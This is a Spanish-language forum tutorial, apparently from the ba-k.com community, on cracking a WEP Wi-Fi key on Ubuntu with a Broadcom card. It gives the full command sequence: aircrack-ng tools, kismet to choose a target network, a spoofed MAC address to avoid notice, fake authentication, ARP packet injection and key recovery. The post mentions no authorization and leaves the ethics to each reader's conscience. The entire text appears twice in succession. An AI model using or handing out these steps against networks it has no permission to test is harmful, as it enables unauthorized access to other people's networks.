Bueno aqui les dejo este tuto haber si a mas de uno le es util. Les mostrare como en pokos y sencillos comandos puedes realizar auditoria wireless y obtener una clave wep usando tu broadcom en ubuntu 8.10.
Para tener modo monitor en tu broadcom pasate por este tuto y despues continua leyendo.
http://www.ba-k.com/showthread.php?t=367310 :histerica:
Si ya lo tienes comenzemos.
1 Poner en modo monitor la tarjeta.
sudo airmon-ng start wlan0 (donde wlan0 es mi interfaz)
![](/foro/proxy.php?image=http%3A%2F%2Fimg150.imageshack.us%2Fimg150%2F2083%2Fpantallazopz1.th.png&hash=8b99111aafdaca8655e3e4526463a5c0)
Ahora puede ver que se crea la interfaz mon0 y es con la que vamos a trabajar.
2 Ahora instala kismet con el siguiente comando
sudo apt-get install kismet
y correlo con este otro
sudo kismet -c bcm43xx,mon0,b43
donde bcm43xx es la tarjeta, mon0 la interfaz y b43 el driver
te aparecera algo como esto.
![](/foro/proxy.php?image=http%3A%2F%2Fimg172.imageshack.us%2Fimg172%2F8103%2Fpantallazo1fy8.th.png&hash=0e5c670a88c97e382b6807e2d83cf9d6)
Ahora teclea <space> , s y luego b , te dara acceso a la lista de la redes que tienes disponibles.Elige una y teclea i en este ejemplo es RELOJERIA.
![](/foro/proxy.php?image=http%3A%2F%2Fimg403.imageshack.us%2Fimg403%2F818%2Fpantallazo2ws0.th.png&hash=15adb55e6caaaf3d6b07dbe745569ef7)
apunta el ESSID, BSSID y el canal.
Ahora que tienes esta info importante acerca de la red. teclea lo siguiente.
sudo rmmod b43
sudo modprobe b43
sudo airmon-ng start wlan0 c
donde c es el canal en donde transmite la red. Ahora estas en modo monitor sobre el canal de la red que quieres obtener lo cual es mejor.
3 (opcional) Como buena practica de seguridad cambia tu mac para que no te veas muy obio con Macchanger.
sudo apt-get install macchanger
luego
sudo ifconfig mon0 down
sudo macchanger -r mon0
sudo ifconfig mon0 up
y apunta tu Fake Mac.
4 Ahora que tienes tu Fake Mac y los datos de la red hagamoslo.
sudo airodump-ng --w capturas -c N mon0
N = canal de la red que antes apuntaste
capturas = nombre del archivo donde guardaras los paquetes
y te debe salir algo como lo siguiente.
![](/foro/proxy.php?image=http%3A%2F%2Fimg90.imageshack.us%2Fimg90%2F7585%2Fpantallazo4tp6.th.png&hash=46b3c0c7f64eeada0bca046d520e9276)
Observa la columna Data en este ejemplo esta en 0 lo cual es que no hay mucha actividad en la red, entonces tenemos que inyectar paquetes.
5 Necesitamos asociarnos en la red por lo cual tecleamos.
aireplay-ng -1 N -e ESSID -a BSSID -h TUMAC mon0
1 = el tipo de ataque de autentificacion
N = canal de la red que ya apuntaste
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
mon0 = interfaz en monitor
![](/foro/proxy.php?image=http%3A%2F%2Fimg10.imageshack.us%2Fimg10%2F521%2Fpantallazo5oo1.th.png&hash=46b1030af638c5bcb0488b33e8d8e011)
listo estamos asociados.
6 Ahora es necesaria inyectar los paquetes
aireplay-ng -3 -b BSSID -h TUMAC mon0
3 = ataque de inyeccion
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
![](/foro/proxy.php?image=http%3A%2F%2Fimg502.imageshack.us%2Fimg502%2F3301%2Fpantallazo6gw1.th.png&hash=3c0f4eb095238c8e4065c7df3fc4cb13)
Nota como se capturan los ARP , cheke de nuevo la pantalla donde estaba la columna data y observa como ahora el numero aumenta.
![](/foro/proxy.php?image=http%3A%2F%2Fimg12.imageshack.us%2Fimg12%2F7674%2Fpantallazo7gk6.th.png&hash=ae50ec8705df9c4fa841d58247046cd6)
Ya solo es cuestion de esperar un rato a que se capturen los paquetes, yo por lo general espero a tener unos 50000 en la columna data pero pues depende de la red la cantidad necesaria.
7 Ahora obten la clave wep ingresando al directorio en donde esta el archivo capturas por medio de la consola y teclea.
sudo aircrack-ng capturas.cap
te saldra algo asi , elige del menu la red que de tu interes.
![](/foro/proxy.php?image=http%3A%2F%2Fimg3.imageshack.us%2Fimg3%2F226%2Fpantallazo8xi5.th.png&hash=639f84da31cb32eb97e43b8bf8af89a3)
entonces empesara a obtener la clave wep y cuando este lista wow a disfrutar.
![](/foro/proxy.php?image=http%3A%2F%2Fimg21.imageshack.us%2Fimg21%2F4884%2Fpantallazo9iz2.th.png&hash=9443d2f2f4c4b1bb0b7e7ac676bff6f9)
sudo airmon-ng stop wlan0
Ojo . no olvides detener el modo monitor y dejar tu tarjeta trabajando normal
![](/foro/proxy.php?image=http%3A%2F%2Fimg18.imageshack.us%2Fimg18%2F6730%2Fpantallazo10ij3.th.png&hash=a49b8645b6431f461b18b5824fd5967b)
![](/foro/proxy.php?image=http%3A%2F%2Fimg22.imageshack.us%2Fimg22%2F7287%2Fpantallazo11jg4.th.png&hash=8ef74ec7f580b4a7cff6edba7eee7baf)
Bueno espero les sea util :vientos: y pues se me hace un buen aporte a la comunidad bakuna, lo hize con el fin educativo no por enseñarles a hacer maldades bueno cada kien su conciencia :histerica:. Tambien espero haber redactado de una manera clara, y no haberme ekivokado en la sintaxis de los comandos, cualquier duda pregunten.
Saludos a todos. :vientos: :vientos: :vientos:
Para tener modo monitor en tu broadcom pasate por este tuto y despues continua leyendo.
http://www.ba-k.com/showthread.php?t=367310 :histerica:
Si ya lo tienes comenzemos.
1 Poner en modo monitor la tarjeta.
sudo airmon-ng start wlan0 (donde wlan0 es mi interfaz)
![](/foro/proxy.php?image=http%3A%2F%2Fimg150.imageshack.us%2Fimg150%2F2083%2Fpantallazopz1.th.png&hash=8b99111aafdaca8655e3e4526463a5c0)
Ahora puede ver que se crea la interfaz mon0 y es con la que vamos a trabajar.
2 Ahora instala kismet con el siguiente comando
sudo apt-get install kismet
y correlo con este otro
sudo kismet -c bcm43xx,mon0,b43
donde bcm43xx es la tarjeta, mon0 la interfaz y b43 el driver
te aparecera algo como esto.
![](/foro/proxy.php?image=http%3A%2F%2Fimg172.imageshack.us%2Fimg172%2F8103%2Fpantallazo1fy8.th.png&hash=0e5c670a88c97e382b6807e2d83cf9d6)
Ahora teclea <space> , s y luego b , te dara acceso a la lista de la redes que tienes disponibles.Elige una y teclea i en este ejemplo es RELOJERIA.
![](/foro/proxy.php?image=http%3A%2F%2Fimg403.imageshack.us%2Fimg403%2F818%2Fpantallazo2ws0.th.png&hash=15adb55e6caaaf3d6b07dbe745569ef7)
apunta el ESSID, BSSID y el canal.
Ahora que tienes esta info importante acerca de la red. teclea lo siguiente.
sudo rmmod b43
sudo modprobe b43
sudo airmon-ng start wlan0 c
donde c es el canal en donde transmite la red. Ahora estas en modo monitor sobre el canal de la red que quieres obtener lo cual es mejor.
3 (opcional) Como buena practica de seguridad cambia tu mac para que no te veas muy obio con Macchanger.
sudo apt-get install macchanger
luego
sudo ifconfig mon0 down
sudo macchanger -r mon0
sudo ifconfig mon0 up
y apunta tu Fake Mac.
4 Ahora que tienes tu Fake Mac y los datos de la red hagamoslo.
sudo airodump-ng --w capturas -c N mon0
N = canal de la red que antes apuntaste
capturas = nombre del archivo donde guardaras los paquetes
y te debe salir algo como lo siguiente.
![](/foro/proxy.php?image=http%3A%2F%2Fimg90.imageshack.us%2Fimg90%2F7585%2Fpantallazo4tp6.th.png&hash=46b3c0c7f64eeada0bca046d520e9276)
Observa la columna Data en este ejemplo esta en 0 lo cual es que no hay mucha actividad en la red, entonces tenemos que inyectar paquetes.
5 Necesitamos asociarnos en la red por lo cual tecleamos.
aireplay-ng -1 N -e ESSID -a BSSID -h TUMAC mon0
1 = el tipo de ataque de autentificacion
N = canal de la red que ya apuntaste
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
mon0 = interfaz en monitor
![](/foro/proxy.php?image=http%3A%2F%2Fimg10.imageshack.us%2Fimg10%2F521%2Fpantallazo5oo1.th.png&hash=46b1030af638c5bcb0488b33e8d8e011)
listo estamos asociados.
6 Ahora es necesaria inyectar los paquetes
aireplay-ng -3 -b BSSID -h TUMAC mon0
3 = ataque de inyeccion
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
![](/foro/proxy.php?image=http%3A%2F%2Fimg502.imageshack.us%2Fimg502%2F3301%2Fpantallazo6gw1.th.png&hash=3c0f4eb095238c8e4065c7df3fc4cb13)
Nota como se capturan los ARP , cheke de nuevo la pantalla donde estaba la columna data y observa como ahora el numero aumenta.
![](/foro/proxy.php?image=http%3A%2F%2Fimg12.imageshack.us%2Fimg12%2F7674%2Fpantallazo7gk6.th.png&hash=ae50ec8705df9c4fa841d58247046cd6)
Ya solo es cuestion de esperar un rato a que se capturen los paquetes, yo por lo general espero a tener unos 50000 en la columna data pero pues depende de la red la cantidad necesaria.
7 Ahora obten la clave wep ingresando al directorio en donde esta el archivo capturas por medio de la consola y teclea.
sudo aircrack-ng capturas.cap
te saldra algo asi , elige del menu la red que de tu interes.
![](/foro/proxy.php?image=http%3A%2F%2Fimg3.imageshack.us%2Fimg3%2F226%2Fpantallazo8xi5.th.png&hash=639f84da31cb32eb97e43b8bf8af89a3)
entonces empesara a obtener la clave wep y cuando este lista wow a disfrutar.
![](/foro/proxy.php?image=http%3A%2F%2Fimg21.imageshack.us%2Fimg21%2F4884%2Fpantallazo9iz2.th.png&hash=9443d2f2f4c4b1bb0b7e7ac676bff6f9)
sudo airmon-ng stop wlan0
Ojo . no olvides detener el modo monitor y dejar tu tarjeta trabajando normal
![](/foro/proxy.php?image=http%3A%2F%2Fimg18.imageshack.us%2Fimg18%2F6730%2Fpantallazo10ij3.th.png&hash=a49b8645b6431f461b18b5824fd5967b)
![](/foro/proxy.php?image=http%3A%2F%2Fimg22.imageshack.us%2Fimg22%2F7287%2Fpantallazo11jg4.th.png&hash=8ef74ec7f580b4a7cff6edba7eee7baf)
Bueno espero les sea util :vientos: y pues se me hace un buen aporte a la comunidad bakuna, lo hize con el fin educativo no por enseñarles a hacer maldades bueno cada kien su conciencia :histerica:. Tambien espero haber redactado de una manera clara, y no haberme ekivokado en la sintaxis de los comandos, cualquier duda pregunten.
Saludos a todos. :vientos: :vientos: :vientos: